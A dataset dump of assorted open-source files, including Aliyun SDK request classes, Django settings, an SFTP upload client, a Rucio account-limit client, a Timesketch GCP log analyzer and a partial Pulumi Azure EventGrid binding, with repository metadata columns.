hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a18882ed88b15ef488e2549495977d526ab9588
| 2,195
|
py
|
Python
|
aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/ListAgentEventsRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/ListAgentEventsRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/ListAgentEventsRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkccc.endpoint import endpoint_data
class ListAgentEventsRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'CCC', '2017-07-05', 'ListAgentEvents')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_StartTime(self):
return self.get_query_params().get('StartTime')
def set_StartTime(self,StartTime):
self.add_query_param('StartTime',StartTime)
def get_StopTime(self):
return self.get_query_params().get('StopTime')
def set_StopTime(self,StopTime):
self.add_query_param('StopTime',StopTime)
def get_RamIds(self):
return self.get_query_params().get('RamIds')
def set_RamIds(self,RamIds):
for i in range(len(RamIds)):
if RamIds[i] is not None:
self.add_query_param('RamId.' + str(i + 1) , RamIds[i]);
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_Events(self):
return self.get_query_params().get('Events')
def set_Events(self,Events):
for i in range(len(Events)):
if Events[i] is not None:
self.add_query_param('Event.' + str(i + 1) , Events[i]);
| 33.769231
| 74
| 0.740319
|
4a188903ce39a19145a3d803a250acdd5583c378
| 423
|
py
|
Python
|
apps/fithm-service/libs/depends/register.py
|
sergio1221/flask-backend
|
11a9e0db5b5e664fcc820919d97039738176ac62
|
[
"BSD-3-Clause"
] | 3
|
2022-03-04T03:05:55.000Z
|
2022-03-04T09:02:32.000Z
|
apps/fithm-service/libs/depends/register.py
|
sergio1221/flask-backend
|
11a9e0db5b5e664fcc820919d97039738176ac62
|
[
"BSD-3-Clause"
] | null | null | null |
apps/fithm-service/libs/depends/register.py
|
sergio1221/flask-backend
|
11a9e0db5b5e664fcc820919d97039738176ac62
|
[
"BSD-3-Clause"
] | null | null | null |
from libs.quovo.base import QuovoRequest
from .entry import DIEntry, container
def register_all():
'''Register all DI entries'''
register_admin_entries()
register_helpers()
def register_admin_entries():
pass
def register_helpers():
def quovo_request_create():
return QuovoRequest()
container.add(DIEntry(
QuovoRequest, quovo_request_create
))
| 16.269231
| 43
| 0.659574
|
4a188a4cb2cb69cd0df134eb851677207baed735
| 3,500
|
py
|
Python
|
aliyun-python-sdk-emr/aliyunsdkemr/request/v20160408/ModifyClusterServiceConfigRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 1,001
|
2015-07-24T01:32:41.000Z
|
2022-03-25T01:28:18.000Z
|
aliyun-python-sdk-emr/aliyunsdkemr/request/v20160408/ModifyClusterServiceConfigRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 363
|
2015-10-20T03:15:00.000Z
|
2022-03-08T12:26:19.000Z
|
aliyun-python-sdk-emr/aliyunsdkemr/request/v20160408/ModifyClusterServiceConfigRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 682
|
2015-09-22T07:19:02.000Z
|
2022-03-22T09:51:46.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkemr.endpoint import endpoint_data
class ModifyClusterServiceConfigRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Emr', '2016-04-08', 'ModifyClusterServiceConfig','emr')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_RefreshHostConfig(self):
return self.get_query_params().get('RefreshHostConfig')
def set_RefreshHostConfig(self,RefreshHostConfig):
self.add_query_param('RefreshHostConfig',RefreshHostConfig)
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_HostInstanceId(self):
return self.get_query_params().get('HostInstanceId')
def set_HostInstanceId(self,HostInstanceId):
self.add_query_param('HostInstanceId',HostInstanceId)
def get_ServiceName(self):
return self.get_query_params().get('ServiceName')
def set_ServiceName(self,ServiceName):
self.add_query_param('ServiceName',ServiceName)
def get_GatewayClusterIdLists(self):
return self.get_query_params().get('GatewayClusterIdList')
def set_GatewayClusterIdLists(self, GatewayClusterIdLists):
for depth1 in range(len(GatewayClusterIdLists)):
if GatewayClusterIdLists[depth1] is not None:
self.add_query_param('GatewayClusterIdList.' + str(depth1 + 1) , GatewayClusterIdLists[depth1])
def get_ConfigParams(self):
return self.get_query_params().get('ConfigParams')
def set_ConfigParams(self,ConfigParams):
self.add_query_param('ConfigParams',ConfigParams)
def get_ConfigType(self):
return self.get_query_params().get('ConfigType')
def set_ConfigType(self,ConfigType):
self.add_query_param('ConfigType',ConfigType)
def get_GroupId(self):
return self.get_query_params().get('GroupId')
def set_GroupId(self,GroupId):
self.add_query_param('GroupId',GroupId)
def get_ClusterId(self):
return self.get_query_params().get('ClusterId')
def set_ClusterId(self,ClusterId):
self.add_query_param('ClusterId',ClusterId)
def get_CustomConfigParams(self):
return self.get_query_params().get('CustomConfigParams')
def set_CustomConfigParams(self,CustomConfigParams):
self.add_query_param('CustomConfigParams',CustomConfigParams)
def get_Comment(self):
return self.get_query_params().get('Comment')
def set_Comment(self,Comment):
self.add_query_param('Comment',Comment)
| 35
| 100
| 0.773143
|
4a188b12918e6b0e9f8e6f9cc1f7a056cc5daf48
| 42
|
py
|
Python
|
pymkup/__init__.py
|
psolin/pymkup
|
5f2e5787f3150e10b9c6391c805b02be7496cdc1
|
[
"MIT"
] | 7
|
2021-04-17T11:35:00.000Z
|
2021-12-30T04:05:27.000Z
|
pymkup/__init__.py
|
psolin/pymkup
|
5f2e5787f3150e10b9c6391c805b02be7496cdc1
|
[
"MIT"
] | 23
|
2021-04-15T18:01:44.000Z
|
2021-05-21T15:58:59.000Z
|
pymkup/__init__.py
|
psolin/pymkup
|
5f2e5787f3150e10b9c6391c805b02be7496cdc1
|
[
"MIT"
] | 2
|
2021-04-20T18:09:46.000Z
|
2021-04-24T13:04:04.000Z
|
from .pymkup import *
__version__ = '0.1'
| 14
| 21
| 0.690476
|
4a188c0342bb9916a6347c85d5a2c3f8cfa222f8
| 3,210
|
py
|
Python
|
app/sftp/ftp_client.py
|
alphagov/notifications-ftp
|
a3e2365e1bf31d540361cb40d60faa34414b10ab
|
[
"MIT"
] | 1
|
2018-01-08T03:07:42.000Z
|
2018-01-08T03:07:42.000Z
|
app/sftp/ftp_client.py
|
alphagov/notifications-ftp
|
a3e2365e1bf31d540361cb40d60faa34414b10ab
|
[
"MIT"
] | 182
|
2018-01-08T01:59:04.000Z
|
2022-03-11T15:47:57.000Z
|
app/sftp/ftp_client.py
|
alphagov/notifications-ftp
|
a3e2365e1bf31d540361cb40d60faa34414b10ab
|
[
"MIT"
] | 3
|
2018-01-08T01:54:41.000Z
|
2021-04-10T19:10:29.000Z
|
from contextlib import contextmanager
import pysftp
from flask import current_app
from monotonic import monotonic
NOTIFY_SUBFOLDER = 'notify'
class FtpException(Exception):
pass
class FtpClient():
def init_app(self, app):
self.host = app.config.get('FTP_HOST')
self.username = app.config.get('FTP_USERNAME')
self.password = app.config.get('FTP_PASSWORD')
@contextmanager
def _sftp(self):
try:
cnopts = pysftp.CnOpts()
cnopts.hostkeys = None
current_app.logger.info("opening connection to {}".format(self.host))
with pysftp.Connection(self.host, username=self.username, password=self.password, cnopts=cnopts) as sftp:
yield sftp
except Exception as e:
# reraise all exceptions as FtpException to ensure we can handle them down the line
current_app.logger.exception(e)
raise FtpException("Failed to sFTP file")
def send_zip(self, zip_data, filename):
with self._sftp() as sftp:
upload_zip(sftp, zip_data, filename)
def file_exists_with_correct_size(self, filename, zip_data_len):
with self._sftp() as sftp:
check_file_exist_and_is_right_size(sftp, filename, zip_data_len)
def upload_zip(sftp, zip_data, filename):
sftp.chdir(NOTIFY_SUBFOLDER)
zip_data_len = len(zip_data)
current_app.logger.info("uploading zip {} of total size {:,}".format(filename, zip_data_len))
start_time = monotonic()
if sftp.exists('{}/{}'.format(sftp.pwd, filename)):
stats = sftp.lstat('{}/{}'.format(sftp.pwd, filename))
if stats.st_size == zip_data_len:
current_app.logger.info('{} already exists on DVLA ftp with matching filesize {}, skipping'.format(
filename, stats.st_size
))
return
else:
current_app.logger.info('{} already exists on DVLA ftp with different filesize {}, overwriting'.format(
filename, stats.st_size
))
upload_start_time = monotonic()
with sftp.open('{}/{}'.format(sftp.pwd, filename), mode='w') as remote_file:
remote_file.set_pipelined()
zip_data = memoryview(zip_data)
remote_file.write(zip_data)
upload_duration = monotonic() - upload_start_time
current_app.logger.info("uploaded file {} of total size {} bytes in {} seconds".format(
filename, zip_data_len, upload_duration))
check_file_exist_and_is_right_size(sftp, filename, zip_data_len)
current_app.logger.info("Data {} uploaded to DVLA".format(filename))
current_app.logger.info("Total duration for {} {} seconds".format(filename, monotonic() - start_time))
def check_file_exist_and_is_right_size(sftp, filename, zip_data_len):
if filename in sftp.listdir():
stats = sftp.lstat('{}/{}'.format(sftp.pwd, filename))
if stats.st_size != zip_data_len:
raise FtpException(
"Zip file {} uploaded but size is incorrect: is {}, expected {}".format(
filename, stats.st_size, zip_data_len))
else:
raise FtpException("Zip file {} not uploaded".format(filename))
| 36.067416
| 117
| 0.655452
|
4a188c266151a72f110ca85b106ae3097c4725c5
| 889
|
py
|
Python
|
tools/migrations/0020_auto_20180206_1419.py
|
moonbirddk/networked-toolbox
|
b059b77bfda173794b3cad55874cb06edc70d0e1
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2016-09-02T12:45:31.000Z
|
2018-02-10T10:18:11.000Z
|
tools/migrations/0020_auto_20180206_1419.py
|
Socialsquare/networked-toolbox
|
b059b77bfda173794b3cad55874cb06edc70d0e1
|
[
"BSD-2-Clause-FreeBSD"
] | 17
|
2020-03-24T15:58:05.000Z
|
2022-02-10T08:08:57.000Z
|
tools/migrations/0020_auto_20180206_1419.py
|
moonbirddk/networked-toolbox
|
b059b77bfda173794b3cad55874cb06edc70d0e1
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2018-01-05T08:02:18.000Z
|
2018-01-05T08:02:18.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-02-06 14:19
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('tools', '0019_auto_20180206_1108'),
]
operations = [
migrations.AlterField(
model_name='story',
name='category_group',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stories', to='tools.CategoryGroup', verbose_name='Thematic Area'),
),
migrations.AlterField(
model_name='story',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='author'),
),
]
| 31.75
| 184
| 0.664792
|
4a188c64bdfbd75470ddc88838e3e7e35d6a3e68
| 236
|
py
|
Python
|
sawyer/ros/envs/sawyer/__init__.py
|
taohnouaccountb/gym-sawyer
|
e1b7259dcb21216f760bca05d87467d8df003d44
|
[
"MIT"
] | 35
|
2018-10-29T07:19:34.000Z
|
2021-02-05T16:24:00.000Z
|
sawyer/ros/envs/sawyer/__init__.py
|
taohnouaccountb/gym-sawyer
|
e1b7259dcb21216f760bca05d87467d8df003d44
|
[
"MIT"
] | 21
|
2018-10-24T05:51:35.000Z
|
2020-09-11T10:40:31.000Z
|
sawyer/ros/envs/sawyer/__init__.py
|
taohnouaccountb/gym-sawyer
|
e1b7259dcb21216f760bca05d87467d8df003d44
|
[
"MIT"
] | 9
|
2018-11-12T14:28:59.000Z
|
2020-04-13T12:49:21.000Z
|
from sawyer.ros.envs.sawyer.pick_and_place_env import PickAndPlaceEnv
from sawyer.ros.envs.sawyer.push_env import PushEnv
from sawyer.ros.envs.sawyer.reacher_env import ReacherEnv
__all__ = ["PickAndPlaceEnv", "PushEnv", "ReacherEnv"]
| 39.333333
| 69
| 0.826271
|
4a188d36e2a73d58f462e1a52d2518b3fdf84a8d
| 2,013
|
py
|
Python
|
timesketch/lib/analyzers/gcp_servicekey.py
|
wajihyassine/timesketch
|
b099d1afb33d0b9f906a0ad407979c8f22a54476
|
[
"Apache-2.0"
] | 1,810
|
2015-01-03T22:34:45.000Z
|
2022-03-30T10:23:18.000Z
|
timesketch/lib/analyzers/gcp_servicekey.py
|
wajihyassine/timesketch
|
b099d1afb33d0b9f906a0ad407979c8f22a54476
|
[
"Apache-2.0"
] | 1,291
|
2015-01-08T00:00:12.000Z
|
2022-03-29T03:26:58.000Z
|
timesketch/lib/analyzers/gcp_servicekey.py
|
wajihyassine/timesketch
|
b099d1afb33d0b9f906a0ad407979c8f22a54476
|
[
"Apache-2.0"
] | 519
|
2015-01-20T09:26:06.000Z
|
2022-03-29T11:02:10.000Z
|
"""Sketch analyzer plugin for GCP Service Key usage."""
from __future__ import unicode_literals
from timesketch.lib.analyzers import interface
from timesketch.lib.analyzers import manager
class GcpServiceKeySketchPlugin(interface.BaseAnalyzer):
"""Analyzer for GCP Service Key usage."""
NAME = 'gcp_servicekey'
DISPLAY_NAME = 'Google Compute Engine actions'
DESCRIPTION = 'Extract GCE actions from Stackdriver logs'
def run(self):
"""Entry point for the analyzer.
Returns:
String with summary of the analyzer result
"""
# TODO: update dftimewolf stackdriver module to produce more detailed
# attributes
query = ('principalEmail:*gserviceaccount.com')
return_fields = ['message', 'methodName']
events = self.event_stream(
query_string=query, return_fields=return_fields)
simple_counter = 0
for event in events:
# Fields to analyze.
method_name = event.source.get('methodName')
if 'CreateServiceAccount' in method_name:
event.add_tags(['service-account-created'])
if 'compute.instances.insert' in method_name:
event.add_tags(['gce-instance-created'])
if 'compute.firewalls.insert' in method_name:
event.add_tags(['fw-rule-created'])
if 'compute.networks.insert' in method_name:
event.add_tags(['network-created'])
# Commit the event to the datastore.
event.commit()
simple_counter += 1
# Create a saved view with our query.
if simple_counter:
self.sketch.add_view(
view_name='GCP ServiceKey activity', analyzer_name=self.NAME,
query_string=query)
return ('GCP ServiceKey analyzer completed with '
'{0:d} service key marked').format(simple_counter)
manager.AnalysisManager.register_analyzer(GcpServiceKeySketchPlugin)
| 32.467742
| 77
| 0.639344
|
4a188e09fcbdc83871c91e2f96b6401db7927b13
| 6,557
|
py
|
Python
|
lib/rucio/client/accountlimitclient.py
|
lgoossen/rucio
|
12c42ad15e55ed30a5fd6ddf90526e657827740c
|
[
"Apache-2.0"
] | null | null | null |
lib/rucio/client/accountlimitclient.py
|
lgoossen/rucio
|
12c42ad15e55ed30a5fd6ddf90526e657827740c
|
[
"Apache-2.0"
] | null | null | null |
lib/rucio/client/accountlimitclient.py
|
lgoossen/rucio
|
12c42ad15e55ed30a5fd6ddf90526e657827740c
|
[
"Apache-2.0"
] | 1
|
2020-01-30T11:03:53.000Z
|
2020-01-30T11:03:53.000Z
|
# Copyright 2014-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2014-2018
# - Cedric Serfon <cedric.serfon@cern.ch>, 2014
# - Vincent Garonne <vgaronne@gmail.com>, 2014-2018
# - Ralph Vigne <ralph.vigne@cern.ch>, 2015
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2019
#
# PY3K COMPATIBLE
from json import dumps
from requests.status_codes import codes
from rucio.client.baseclient import BaseClient
from rucio.client.baseclient import choice
from rucio.common.utils import build_url
class AccountLimitClient(BaseClient):
"""Account limit client class for working with account limits"""
ACCOUNTLIMIT_BASEURL = 'accountlimits'
def __init__(self, rucio_host=None, auth_host=None, account=None, ca_cert=None,
auth_type=None, creds=None, timeout=600, user_agent='rucio-clients'):
super(AccountLimitClient, self).__init__(rucio_host, auth_host, account, ca_cert,
auth_type, creds, timeout, user_agent)
def set_account_limit(self, account, rse, bytes, locality):
"""
Sets an account limit for a given limit scope.
:param account: The name of the account.
:param rse: The rse name.
:param bytes: An integer with the limit in bytes.
:param locality: The scope of the account limit. 'local' or 'global'.
:return: True if quota was created successfully else False.
"""
if locality == 'local':
return self.set_local_account_limit(account, rse, bytes)
elif locality == 'global':
return self.set_global_account_limit(account, rse, bytes)
else:
from rucio.common.exception import UnsupportedOperation
raise UnsupportedOperation('The provided scope (%s) for the account limit was invalid' % locality)
def delete_account_limit(self, account, rse, locality):
"""
Deletes an account limit for a given limit scope.
:param account: The name of the account.
:param rse: The rse name.
:param locality: The scope of the account limit. 'local' or 'global'.
:return: True if quota was created successfully else False.
"""
if locality == 'local':
return self.delete_local_account_limit(account, rse)
elif locality == 'global':
return self.delete_global_account_limit(account, rse)
else:
from rucio.common.exception import UnsupportedOperation
raise UnsupportedOperation('The provided scope (%s) for the account limit was invalid' % locality)
def set_local_account_limit(self, account, rse, bytes):
"""
Sends the request to set an account limit for an account.
:param account: The name of the account.
:param rse: The rse name.
:param bytes: An integer with the limit in bytes.
:return: True if quota was created successfully else False.
"""
data = dumps({'bytes': bytes})
path = '/'.join([self.ACCOUNTLIMIT_BASEURL, 'local', account, rse])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type='POST', data=data)
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_local_account_limit(self, account, rse):
"""
Sends the request to remove an account limit.
:param account: The name of the account.
:param rse: The rse name.
:return: True if quota was removed successfully. False otherwise.
:raises AccountNotFound: if account doesn't exist.
"""
path = '/'.join([self.ACCOUNTLIMIT_BASEURL, 'local', account, rse])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type='DEL')
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def set_global_account_limit(self, account, rse_expression, bytes):
"""
Sends the request to set a global account limit for an account.
:param account: The name of the account.
:param rse_expression: The rse expression.
:param bytes: An integer with the limit in bytes.
:return: True if quota was created successfully else False.
"""
data = dumps({'bytes': bytes})
path = '/'.join([self.ACCOUNTLIMIT_BASEURL, 'global', account, rse_expression])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type='POST', data=data)
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_global_account_limit(self, account, rse_expression):
"""
Sends the request to remove a global account limit.
:param account: The name of the account.
:param rse_expression: The rse expression.
:return: True if quota was removed successfully. False otherwise.
:raises AccountNotFound: if account doesn't exist.
"""
path = '/'.join([self.ACCOUNTLIMIT_BASEURL, 'global', account, rse_expression])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type='DEL')
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
| 39.263473
| 112
| 0.649687
|
4a188e187f14e6d102b3a9a7a29b8effec070ab7
| 316
|
py
|
Python
|
tests/conftest.py
|
mariomoore/paperace
|
a120560bfc5bf321a5e878ef20db271a77ce400d
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
mariomoore/paperace
|
a120560bfc5bf321a5e878ef20db271a77ce400d
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
mariomoore/paperace
|
a120560bfc5bf321a5e878ef20db271a77ce400d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Dummy conftest.py for paperace.
If you don't know what this is for, just leave it empty.
Read more about conftest.py under:
https://pytest.org/latest/plugins.html
"""
from __future__ import print_function, absolute_import, division
# import pytest
| 24.307692
| 64
| 0.699367
|
4a188e4782729f5ca5c97ad7c393672804bd7624
| 3,234
|
py
|
Python
|
profiles_project/settings.py
|
sumaiyamulla786/profiles-rest-api
|
8b65992ad3dd008defca68ee930ae9ed3fc45d2c
|
[
"MIT"
] | null | null | null |
profiles_project/settings.py
|
sumaiyamulla786/profiles-rest-api
|
8b65992ad3dd008defca68ee930ae9ed3fc45d2c
|
[
"MIT"
] | null | null | null |
profiles_project/settings.py
|
sumaiyamulla786/profiles-rest-api
|
8b65992ad3dd008defca68ee930ae9ed3fc45d2c
|
[
"MIT"
] | null | null | null |
"""
Django settings for profiles_project project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '2*czq+&9q=7$6+=ku$y+^-vd%)_p7n@$mo7qz-egry!&3r0@xm'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'profiles_api',
'rest_framework',
'rest_framework.authtoken'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'profiles_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'profiles_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'profiles_api.UserProfile'
| 25.872
| 91
| 0.698207
|
4a188edced93db6cf515eff90ce5ec876340a0e4
| 34,628
|
py
|
Python
|
sdk/python/pulumi_azure/eventhub/event_grid_topic.py
|
aangelisc/pulumi-azure
|
71dd9c75403146e16f7480e5a60b08bc0329660e
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/eventhub/event_grid_topic.py
|
aangelisc/pulumi-azure
|
71dd9c75403146e16f7480e5a60b08bc0329660e
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/eventhub/event_grid_topic.py
|
aangelisc/pulumi-azure
|
71dd9c75403146e16f7480e5a60b08bc0329660e
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['EventGridTopicArgs', 'EventGridTopic']
@pulumi.input_type
class EventGridTopicArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]]] = None,
input_mapping_default_values: Optional[pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs']] = None,
input_mapping_fields: Optional[pulumi.Input['EventGridTopicInputMappingFieldsArgs']] = None,
input_schema: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a EventGridTopic resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
:param pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs'] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
:param pulumi.Input['EventGridTopicInputMappingFieldsArgs'] input_mapping_fields: A `input_mapping_fields` block as defined below.
:param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
